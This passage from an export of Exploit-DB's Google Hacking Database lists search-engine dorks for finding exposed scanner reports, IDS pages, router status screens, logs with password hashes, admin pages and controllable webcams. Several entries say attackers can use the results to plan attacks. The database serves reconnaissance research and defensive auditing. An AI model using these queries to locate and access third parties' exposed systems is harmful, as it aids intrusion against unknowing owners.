<textualDescription>This search shows the webserver access stats as the user &quot;admin&quot;. The language used is Japanese and the search includes the &quot;00h&quot; value which is only shown when the admin is logged in.</textualDescription>
<query>&quot;apricot - admin&quot; 00h</query>
<querystring>https://www.google.com/search?q=%22apricot+-+admin%22+00h&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>340</id>
<link>https://www.exploit-db.com/ghdb/340</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;by Reimar Hoven. All Rights Reserved. Disclaimer&quot; | inurl:&quot;log/logdb.dta&quot;</shortDescription>
<textualDescription>dork: &quot;by Reimar Hoven. All Rights Reserved. Disclaimer&quot; | inurl:&quot;log/logdb.dta&quot; this is for PHP Web Statistik script, you can go to: http://[target]/[path_to]/log/logdb.dta to see clear text logs</textualDescription>
<query>&quot;by Reimar Hoven. All Rights Reserved. Disclaimer&quot; | inurl:&quot;log/logdb.dta&quot;</query>
<querystring>https://www.google.com/search?q=%22by+Reimar+Hoven.+All+Rights+Reserved.+Disclaimer%22+%7C+inurl%3A%22log%2Flogdb.dta%22+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4334</id>
<link>https://www.exploit-db.com/ghdb/4334</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;generated by Munin&quot; inurl:index -intext:index localhost</shortDescription>
<textualDescription>Panels of Munin networks.
Enjoy.
Dork by Rootkit Pentester.</textualDescription>
<query>&quot;generated by Munin&quot; inurl:index -intext:index localhost</query>
<querystring>https://www.google.com/search?q=&quot;generated by Munin&quot; inurl:index -intext:index localhost</querystring>
<edb></edb>
<date>2016-09-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4695</id>
<link>https://www.exploit-db.com/ghdb/4695</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;IBM Security AppScan Report&quot; ext:pdf</shortDescription>
<textualDescription>&quot;IBM Security AppScan Report&quot; ext:pdf
This dork show results that was created by IBM Security AppScan Standard
ManhNho
</textualDescription>
<query>&quot;IBM Security AppScan Report&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=&quot;IBM Security AppScan Report&quot; ext:pdf</querystring>
<edb></edb>
<date>2018-03-12</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4850</id>
<link>https://www.exploit-db.com/ghdb/4850</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;index of /ups.com/WebTracking&quot;</shortDescription>
<textualDescription>*Google* dork description: Emotet infected domains. Emotet is a banking
trojan malware program which
obtains financial information by injecting computer code
into the networking stack
of an infected computer
*Google Search: *&quot;index of /ups.com/WebTracking&quot;
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*
</textualDescription>
<query>&quot;index of /ups.com/WebTracking&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of /ups.com/WebTracking&quot;</querystring>
<edb></edb>
<date>2018-06-07</date>
<author>Alfie</author>
</entry>
<entry>
<id>145</id>
<link>https://www.exploit-db.com/ghdb/145</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Network Host Assessment Report&quot; &quot;Internet Scanner&quot;</shortDescription>
<textualDescription>This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.</textualDescription>
<query>&quot;Network Host Assessment Report&quot; &quot;Internet Scanner&quot;</query>
<querystring>https://www.google.com/search?q=%22Network+Host+Assessment+Report%22+%22Internet+Scanner%22</querystring>
<edb></edb>
<date>2004-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>724</id>
<link>https://www.exploit-db.com/ghdb/724</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Output produced by SysWatch *&quot;</shortDescription>
<textualDescription>sysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..).</textualDescription>
<query>&quot;Output produced by SysWatch *&quot;</query>
<querystring>https://www.google.com/search?num=200&amp;q=%22Output+produced+by+SysWatch+*%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>726</id>
<link>https://www.exploit-db.com/ghdb/726</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Phorum Admin&quot; &quot;Database Connection&quot; inurl:forum inurl:admin</shortDescription>
<textualDescription>Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages.</textualDescription>
<query>&quot;Phorum Admin&quot; &quot;Database Connection&quot; inurl:forum inurl:admin</query>
<querystring>https://www.google.com/search?num=20&amp;q=%22Phorum+Admin%22+%22Database+Connection%22+inurl%3Aforum+inurl%3Aadmin</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>493</id>
<link>https://www.exploit-db.com/ghdb/493</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Powered by phpOpenTracker&quot; Statistics</shortDescription>
<textualDescription>phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking.</textualDescription>
<query>&quot;Powered by phpOpenTracker&quot; Statistics</query>
<querystring>https://www.google.com/search?q=%22Powered+by+phpOpenTracker%22+Statistics+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>850</id>
<link>https://www.exploit-db.com/ghdb/850</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;powered | performed by Beyond Security's Automated Scanning&quot; -kazaa -example</shortDescription>
<textualDescription>This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?!</textualDescription>
<query>&quot;powered | performed by Beyond Security's Automated Scanning&quot; -kazaa -example</query>
<querystring>https://www.google.com/search?q=%22powered+%7C+performed+by+Beyond+Security%27s+Automated+Scanning%22+-kazaa+-example</querystring>
<edb></edb>
<date>2005-02-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1169</id>
<link>https://www.exploit-db.com/ghdb/1169</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Shadow Security Scanner performed a vulnerability assessment&quot;</shortDescription>
<textualDescription>This is a googledork to find vulnerability reports produced by Shadow Security Scanner. They contain valuable information which can be used to break into a system.</textualDescription>
<query>&quot;Shadow Security Scanner performed a vulnerability assessment&quot;</query>
<querystring>https://www.google.com/search?q=%22Shadow+Security+Scanner+performed+a+vulnerability+assessment%22&amp;num=100&amp;filter=1</querystring>
<edb></edb>
<date>2005-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>157</id>
<link>https://www.exploit-db.com/ghdb/157</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;SnortSnarf alert page&quot;</shortDescription>
<textualDescription>snort is an intrusion detection system. SnorfSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed.</textualDescription>
<query>&quot;SnortSnarf alert page&quot;</query>
<querystring>https://www.google.com/search?q=%22SnortSnarf+alert+page%22</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1168</id>
<link>https://www.exploit-db.com/ghdb/1168</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;The following report contains confidential information&quot; vulnerability -search</shortDescription>
<textualDescription>This googledork reveals vunerability reports from many different vendors. These reports can contain information which can help an attacker break into a system/network.</textualDescription>
<query>&quot;The following report contains confidential information&quot; vulnerability -search</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22The+following+report+contains+confidential+information%22+vulnerability+-search</querystring>
<edb></edb>
<date>2005-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1350</id>
<link>https://www.exploit-db.com/ghdb/1350</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;The statistics were last updated&quot; &quot;Daily&quot;-microsoft.com</shortDescription>
<textualDescription>Results include many varius Network activity logs</textualDescription>
<query>&quot;The statistics were last updated&quot; &quot;Daily&quot;-microsoft.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22The+statistics+were+last+updated%22+%22Daily%22-microsoft.com</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>430</id>
<link>https://www.exploit-db.com/ghdb/430</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;this proxy is working fine!&quot; &quot;enter *&quot; &quot;URL***&quot; * visit</shortDescription>
<textualDescription>These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy. The experts comment on this is there are much better solutions for surfing anonymously.</textualDescription>
<query>&quot;this proxy is working fine!&quot; &quot;enter *&quot; &quot;URL***&quot; * visit</query>
<querystring>https://www.google.com/search?q=%22this+proxy+is+working+fine!%22+%22enter+*%22+%22URL***%22+*+visit&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>144</id>
<link>https://www.exploit-db.com/ghdb/144</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;This report lists&quot; &quot;identified by Internet Scanner&quot;</shortDescription>
<textualDescription>This search yeids ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.</textualDescription>
<query>&quot;This report lists&quot; &quot;identified by Internet Scanner&quot;</query>
<querystring>https://www.google.com/search?q=%22This+report+lists%22+%22identified+by+Internet+Scanner%22</querystring>
<edb></edb>
<date>2004-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>878</id>
<link>https://www.exploit-db.com/ghdb/878</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Traffic Analysis for&quot; &quot;RMON Port * on unit *&quot;</shortDescription>
<textualDescription>List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198</textualDescription>
<query>&quot;Traffic Analysis for&quot; &quot;RMON Port * on unit *&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=%22Traffic+Analysis+for%22+%22RMON+Port+*+on+unit+*%22</querystring>
<edb></edb>
<date>2005-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>273</id>
<link>https://www.exploit-db.com/ghdb/273</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Version Info&quot; &quot;Boot Version&quot; &quot;Internet Settings&quot;</shortDescription>
<textualDescription>This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack.</textualDescription>
<query>&quot;Version Info&quot; &quot;Boot Version&quot; &quot;Internet Settings&quot;</query>
<querystring>https://www.google.com/search?q=%22Version+Info%22+%22Boot+Version%22+%22Internet+Settings%22</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4319</id>
<link>https://www.exploit-db.com/ghdb/4319</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;Web Application Assessment Report&quot; ext:pdf</shortDescription>
<textualDescription>To search HP WebInspect Scan Report. The dorks is searching report that
scanned before 2016. After 2016, the service of web inspect migrated to HP
Enterprise.
From Huhai-chiang</textualDescription>
<query>&quot;Web Application Assessment Report&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=&quot;Web Application Assessment Report&quot; ext:pdf</querystring>
<edb></edb>
<date>2016-08-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4441</id>
<link>https://www.exploit-db.com/ghdb/4441</link>
<category>Network or Vulnerability Data</category>
<shortDescription>&quot;[boot loader]&quot; &quot;WINNT&quot; ext:ini</shortDescription>
<textualDescription>Finds boot.ini files, showing you what operating systems are running on the server
Dxtroyer</textualDescription>
<query>&quot;[boot loader]&quot; &quot;WINNT&quot; ext:ini</query>
<querystring>https://www.google.com/search?q=&quot;[boot loader]&quot; &quot;WINNT&quot; ext:ini</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>520</id>
<link>https://www.exploit-db.com/ghdb/520</link>
<category>Network or Vulnerability Data</category>
<shortDescription>((inurl:ifgraph &quot;Page generated at&quot;) OR (&quot;This page was built using ifgraph&quot;))</shortDescription>
<textualDescription>ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool.</textualDescription>
<query>((inurl:ifgraph &quot;Page generated at&quot;) OR (&quot;This page was built using ifgraph&quot;))</query>
<querystring>https://www.google.com/search?q=%28%28inurl%3Aifgraph+%22Page+generated+at%22%29+OR+%28%22This+page+was+built+using+ifgraph%22%29%29+</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4323</id>
<link>https://www.exploit-db.com/ghdb/4323</link>
<category>Network or Vulnerability Data</category>
<shortDescription>(inurl:&quot;8080/monitorix&quot; &amp; intext:&quot;Hostname&quot;) | inurl:&quot;8080/monitorix-cgi&quot;</shortDescription>
<textualDescription>Monitorix - system monitoring tool web interface,
by neon</textualDescription>
<query>(inurl:&quot;8080/monitorix&quot; &amp; intext:&quot;Hostname&quot;) | inurl:&quot;8080/monitorix-cgi&quot;</query>
<querystring>https://www.google.com/search?q=(inurl:&quot;8080/monitorix&quot; &amp; intext:&quot;Hostname&quot;) | inurl:&quot;8080/monitorix-cgi&quot;</querystring>
<edb></edb>
<date>2016-08-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6098</id>
<link>https://www.exploit-db.com/ghdb/6098</link>
<category>Network or Vulnerability Data</category>
<shortDescription>-site:&quot;pentest-tools.com&quot; intext:&quot;Scan coverage information&quot; AND &quot;List of tests&quot; ext:PDF</shortDescription>
<textualDescription># Google Dork: -site:&quot;pentest-tools.com&quot; intext:&quot;Scan coverage information&quot;
AND &quot;List of tests&quot; ext:PDF
# Description: Find reports generated by Pentest-Tools.com vulnerability
scanner.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>-site:&quot;pentest-tools.com&quot; intext:&quot;Scan coverage information&quot; AND &quot;List of tests&quot; ext:PDF</query>
<querystring>https://www.google.com/search?q=-site:&quot;pentest-tools.com&quot; intext:&quot;Scan coverage information&quot; AND &quot;List of tests&quot; ext:PDF</querystring>
<edb></edb>
<date>2020-05-19</date>
<author>BillyV4</author>
</entry>
<entry>
<id>5110</id>
<link>https://www.exploit-db.com/ghdb/5110</link>
<category>Network or Vulnerability Data</category>
<shortDescription>allinurl:&quot;/SilverStream/Meta/&quot;</shortDescription>
<textualDescription>Category : Advisories and Vulnerabilities
Description : Dork for finding to disclose data from websites which uses
SilverStream software. It is a web services-oriented applications.
Below are the list of Vulnerability Multiple data disclose
- silver stream server live statistic of time, memory status, session,
license, and more
- Current sessions details of the users who logged in in websites
- Software License key also can find setup of VM to download application
- Access to Silveradmin.jar file which administer the SilverStream Server
- Database name disclose as well as version, Table, columns names etc
- Admin data
- And So on....
Below are few more option available to get data you can play around on URL
/SilverStream/ :-
Administration
Classes
ClusterAdmin
Downloads
ErrorLogs
FullTextIndexer
Listeners
Login
Logout
Meta
Objectstore
Pages
Permissions
Renamer
Resources
Security
Sessions
Statistics
Timestamps
VersionCheck
Dork : allinurl:&quot;/SilverStream/Meta/&quot;
Date : 10/2/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>allinurl:&quot;/SilverStream/Meta/&quot;</query>
<querystring>https://www.google.com/search?q=allinurl:&quot;/SilverStream/Meta/&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>320</id>
<link>https://www.exploit-db.com/ghdb/320</link>
<category>Network or Vulnerability Data</category>
<shortDescription>Analysis Console for Incident Databases</shortDescription>
<textualDescription>ACID stands for for &quot;Analysis Console for Incident Databases&quot;. It is a php frontend for the snort intrusion detection system database.These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, ip addresses, network layout, existance of firewall and IDS systems, and more.</textualDescription>
<query>ACID &quot;by Roman Danyliw&quot; filetype:php</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=ACID+%22by+Roman+Danyliw%22+filetype%3Aphp</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>759</id>
<link>https://www.exploit-db.com/ghdb/759</link>
<category>Network or Vulnerability Data</category>
<shortDescription>ext:cfg radius.cfg</shortDescription>
<textualDescription>&quot;Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods&quot;This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc.</textualDescription>
<query>ext:cfg radius.cfg</query>
<querystring>https://www.google.com/search?q=ext:cfg+radius.cfg&amp;filter=0</querystring>
<edb></edb>
<date>2004-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>521</id>
<link>https://www.exploit-db.com/ghdb/521</link>
<category>Network or Vulnerability Data</category>
<shortDescription>ext:cgi intext:&quot;nrg-&quot; &quot; This web page was created on &quot;</shortDescription>
<textualDescription>NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)</textualDescription>
<query>ext:cgi intext:&quot;nrg-&quot; &quot; This web page was created on &quot;</query>
<querystring>https://www.google.com/search?q=ext:cgi+intext:%22nrg-%22+%22+This+web+page+was+created+on+%22&amp;filter=1</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>712</id>
<link>https://www.exploit-db.com/ghdb/712</link>
<category>Network or Vulnerability Data</category>
<shortDescription>filetype:log intext:&quot;ConnectionManager2&quot;</shortDescription>
<textualDescription>ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in....</textualDescription>
<query>filetype:log intext:&quot;ConnectionManager2&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=+filetype%3Alog+intext%3A%22ConnectionManager2%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>200</id>
<link>https://www.exploit-db.com/ghdb/200</link>
<category>Network or Vulnerability Data</category>
<shortDescription>filetype:pdf &quot;Assessment Report&quot; nessus</shortDescription>
<textualDescription>These are reports from the Nessus Vulnerability Scanner. These report contain detailed information about the vulnerabilities of hosts on a network, a veritable roadmap for attackers to folow.</textualDescription>
<query>filetype:pdf &quot;Assessment Report&quot; nessus</query>
<querystring>https://www.google.com/search?q=filetype%3Apdf+%22Assessment+Report%22+nessus</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>758</id>
<link>https://www.exploit-db.com/ghdb/758</link>
<category>Network or Vulnerability Data</category>
<shortDescription>filetype:php inurl:ipinfo.php &quot;Distributed Intrusion Detection System&quot;</shortDescription>
<textualDescription>Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form.</textualDescription>
<query>filetype:php inurl:ipinfo.php &quot;Distributed Intrusion Detection System&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aphp+inurl%3Aipinfo.php+%22Distributed+Intrusion+Detection+System%22</querystring>
<edb></edb>
<date>2004-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>579</id>
<link>https://www.exploit-db.com/ghdb/579</link>
<category>Network or Vulnerability Data</category>
<shortDescription>filetype:php inurl:nqt intext:&quot;Network Query Tool&quot;</shortDescription>
<textualDescription>Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason.</textualDescription>
<query>filetype:php inurl:nqt intext:&quot;Network Query Tool&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aphp+inurl%3Anqt+intext%3A%22Network+Query+Tool%22+</querystring>
<edb></edb>
<date>2004-10-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>233</id>
<link>https://www.exploit-db.com/ghdb/233</link>
<category>Network or Vulnerability Data</category>
<shortDescription>filetype:vsd vsd network -samples -examples</shortDescription>
<textualDescription>Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign.</textualDescription>
<query>filetype:vsd vsd network -samples -examples</query>
<querystring>https://www.google.com/search?q=filetype%3Avsd+vsd+network+-samples+-examples</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4756</id>
<link>https://www.exploit-db.com/ghdb/4756</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intext:&quot;Powered by Nibbleblog&quot;</shortDescription>
<textualDescription>Finding blogs that are powerded by the Nibbleblog CMS.
Use ethically and responsibly.
Dork by _palonE
</textualDescription>
<query>intext:&quot;Powered by Nibbleblog&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Nibbleblog&quot;</querystring>
<edb></edb>
<date>2018-04-11</date>
<author>_palonE</author>
</entry>
<entry>
<id>4320</id>
<link>https://www.exploit-db.com/ghdb/4320</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intext:&quot;Web Application Report&quot; intext:&quot;This report was created by IBM Security AppScan&quot; ext:pdf</shortDescription>
<textualDescription>To search IBM AppScan vulnerability Report.
From Huhai-chiang</textualDescription>
<query>intext:&quot;Web Application Report&quot; intext:&quot;This report was created by IBM Security AppScan&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=intext:&quot;Web Application Report&quot; intext:&quot;This report was created by IBM Security AppScan&quot; ext:pdf</querystring>
<edb></edb>
<date>2016-08-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>773</id>
<link>https://www.exploit-db.com/ghdb/773</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intext:&quot;Welcome to the Web V.Networks&quot; intitle:&quot;V.Networks [Top]&quot; -filetype:htm</shortDescription>
<textualDescription>see and control JVC webcameras, you can move the camera, zoom... change the settings, etc....</textualDescription>
<query>intext:&quot;Welcome to the Web V.Networks&quot; intitle:&quot;V.Networks [Top]&quot; -filetype:htm</query>
<querystring>https://www.google.com/search?q=intext%3A%22Welcome+to+the+Web+V.Networks%22+intitle%3A%22V.Networks+%5BTop%5D%22+-filetype%3Ahtm+</querystring>
<edb></edb>
<date>2004-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4951</id>
<link>https://www.exploit-db.com/ghdb/4951</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intext:ZAP Scanning Report Summary of Alerts ext:html</shortDescription>
<textualDescription>intext:ZAP Scanning Report Summary of Alerts ext:html
This Google Dork discovers badly configured servers exposing sensitive
OWASP ZAP reports.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:ZAP Scanning Report Summary of Alerts ext:html</query>
<querystring>https://www.google.com/search?q=intext:ZAP Scanning Report Summary of Alerts ext:html</querystring>
<edb></edb>
<date>2018-09-13</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4675</id>
<link>https://www.exploit-db.com/ghdb/4675</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle: &quot;Generated by Acunetix WVS Reporter&quot;</shortDescription>
<textualDescription> intitle: &quot;Generated by Acunetix WVS Reporter&quot;
Finds reports left behind by Acunetix (vulnerability scanner)
ManhNho
</textualDescription>
<query>intitle: &quot;Generated by Acunetix WVS Reporter&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Generated by Acunetix WVS Reporter&quot;</querystring>
<edb></edb>
<date>2018-02-19</date>
<author>ManhNho</author>
</entry>
<entry>
<id>272</id>
<link>https://www.exploit-db.com/ghdb/272</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;ADSL Configuration page&quot;</shortDescription>
<textualDescription>This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack.</textualDescription>
<query>intitle:&quot;ADSL Configuration page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ADSL+Configuration+page%22</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>798</id>
<link>https://www.exploit-db.com/ghdb/798</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Azureus : Java BitTorrent Client Tracker&quot;</shortDescription>
<textualDescription>This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)</textualDescription>
<query>intitle:&quot;Azureus : Java BitTorrent Client Tracker&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Azureus+%3A+Java+BitTorrent+Client+Tracker%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4317</id>
<link>https://www.exploit-db.com/ghdb/4317</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;bandwidthd&quot; &quot;programmed by david hinkle, commissioned by derbytech wireless networking.&quot;</shortDescription>
<textualDescription>BandwidthD Search Report.
Ing. Daniel Maldonadohttp://www.caceriadespammers.com.ar</textualDescription>
<query>intitle:&quot;bandwidthd&quot; &quot;programmed by david hinkle, commissioned by derbytech wireless networking.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;bandwidthd&quot; &quot;programmed by david hinkle, commissioned by derbytech wireless networking.&quot;</querystring>
<edb></edb>
<date>2016-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>889</id>
<link>https://www.exploit-db.com/ghdb/889</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Belarc Advisor Current Profile&quot; intext:&quot;Click here for Belarc's PC Management products, for large and small companies.&quot;</shortDescription>
<textualDescription>People who have foolishly published an audit of their machine(s) on the net with some server info as well</textualDescription>
<query>intitle:&quot;Belarc Advisor Current Profile&quot; intext:&quot;Click here for Belarc's PC Management products, for large and small companies.&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Belarc+Advisor+Current+Profile%22+intext%3A%22Click+here+for+Belarc%27s+PC+Management+products%2C+for+large+and+small+companies.%22&amp;meta</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>799</id>
<link>https://www.exploit-db.com/ghdb/799</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;BNBT Tracker Info&quot;</shortDescription>
<textualDescription>This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being &quot;tracked&quot;, the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!</textualDescription>
<query>intitle:&quot;BNBT Tracker Info&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22BNBT+Tracker+Info%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4676</id>
<link>https://www.exploit-db.com/ghdb/4676</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Burp Scanner Report&quot; | &quot;Report generated by Burp Scanner&quot;</shortDescription>
<textualDescription>intitle:&quot;Burp Scanner Report&quot; | &quot;Report generated by Burp Scanner&quot;
Finds reports left behind by Burp Scanner (vulnerability scanner)
ManhNho
</textualDescription>
<query>intitle:&quot;Burp Scanner Report&quot; | &quot;Report generated by Burp Scanner&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Burp Scanner Report&quot; | &quot;Report generated by Burp Scanner&quot;</querystring>
<edb></edb>
<date>2018-02-20</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5600</id>
<link>https://www.exploit-db.com/ghdb/5600</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Cacti&quot; AND inurl:&quot;/monitor/monitor.php&quot;</shortDescription>
<textualDescription># Dork #
intitle:&quot;Cacti&quot; AND inurl:&quot;/monitor/monitor.php&quot;
This dork possibly allow to view monitoring device status in Cacti.</textualDescription>
<query>intitle:&quot;Cacti&quot; AND inurl:&quot;/monitor/monitor.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Cacti&quot; AND inurl:&quot;/monitor/monitor.php&quot;</querystring>
<edb></edb>
<date>2019-10-28</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5595</id>
